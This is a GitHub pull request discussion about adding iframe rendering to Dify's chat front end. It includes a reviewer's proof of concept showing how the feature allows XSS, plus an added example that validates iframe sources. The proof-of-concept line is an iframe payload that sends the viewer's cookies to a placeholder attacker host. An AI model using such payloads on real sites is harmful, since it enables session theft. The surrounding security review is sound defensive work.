dify
iframe front end rendering
Description
When the generated content contains an iframe tag, the front end implements automatic embedding rendering. The supported parameters and recommended formats are as follows. Note that the src parameter is required, and the default value is provided if the others are left blank:
Fixes # (issue)
Type of Change
Please delete options that are not relevant.
- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] This change requires a documentation update, included: Dify Document
How Has This Been Tested?
Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration
- [ ] TODO
Suggested Checklist:
- [x] I have performed a self-review of my own code
- [ ] I have commented my code, particularly in hard-to-understand areas
- [x] My changes generate no new warnings
- [ ] I ran dev/reformat (backend) and cd web && npx lint-staged (frontend) to appease the lint gods
- [ ] optional: I have made corresponding changes to the documentation
- [ ] optional: I have added tests that prove my fix is effective or that my feature works
- [ ] optional: New and existing unit tests pass locally with my changes
<h1>Welcome to My Web Page</h1> <iframe style="display:none" src="javascript:document.write('<script>document.location="http://malicious.example.com/steal-cookie?cookie="+document.cookie</script>')" ></iframe>
This PR could lead to a potential XSS attack in the chat bubble.
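The comment above shows a `javascript:` URL in the iframe `src`. As an added example (not code from this PR or from Dify), here is one way a renderer can validate iframe attributes from generated content before embedding them; the scheme allowlist, the width/height defaults and the function names are assumptions.

```javascript
// Added example: allowlist check for iframe attributes taken from generated content.
// ALLOWED_SCHEMES, DEFAULTS and the attribute allowlist are assumptions, not Dify's values.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);
const DEFAULTS = { width: '100%', height: '400' };      // hypothetical defaults
const DIMENSION = /^\d{1,4}(px|%)?$/;

// Returns the normalized URL string, or null when src must not be rendered.
function safeIframeSrc(src) {
  if (typeof src !== 'string') return null;
  let url;
  try {
    // The WHATWG parser strips leading whitespace and embedded tabs/newlines,
    // so " \tJaVaScRiPt:" is seen as "javascript:" just as a browser sees it.
    url = new URL(src);            // no base given: relative URLs are rejected
  } catch {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null; // javascript:, data:, blob:, ...
  if (url.username || url.password) return null;       // no credentials in embeds
  return url.href;
}

// Builds the attribute set the renderer may pass to <iframe>, or null to skip rendering.
function safeIframeAttrs(raw) {
  const src = safeIframeSrc(raw.src);
  if (src === null) return null;
  // Only allowlisted keys are emitted; style, srcdoc and on* handlers are never copied.
  // sandbox without allow-same-origin gives the framed page an opaque origin.
  const attrs = { src, sandbox: 'allow-scripts' };
  for (const key of Object.keys(DEFAULTS)) {
    const value = String(raw[key] ?? '').trim();
    attrs[key] = DIMENSION.test(value) ? value : DEFAULTS[key];
  }
  return attrs;
}

// Constructed sample inputs, including the payload shape quoted in the comment above.
const samples = [
  { src: 'https://example.com/embed?id=1', height: '300', style: 'display:none' },
  { src: "javascript:document.write('x')", style: 'display:none' },
  { src: ' \tJaVaScRiPt:alert(1)' },
  { src: 'data:text/html,<b>x</b>' },
  { src: '/relative/path' },
];
for (const s of samples) console.log(JSON.stringify(s.src), '->', safeIframeAttrs(s));
```

Parsing with `URL` before comparing the scheme matters because a string-prefix check on the raw value misses mixed-case and whitespace-padded variants.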
Fixed this issue
<h1 style="color: red;">Red Text</h1>
<h1 style="color: green;">Green Text</h1>
<h1 style="color: blue;">Blue Text</h1>
Hi, I've been redirected to here from my issue. I wonder whether this PR only applies to user inputs. I'd like to embed an iframe in a function/tool calling, so that I can customize the UI when the model calls a tool. Would be great to have something like LobeChat plugins.
@charli117
Close for now.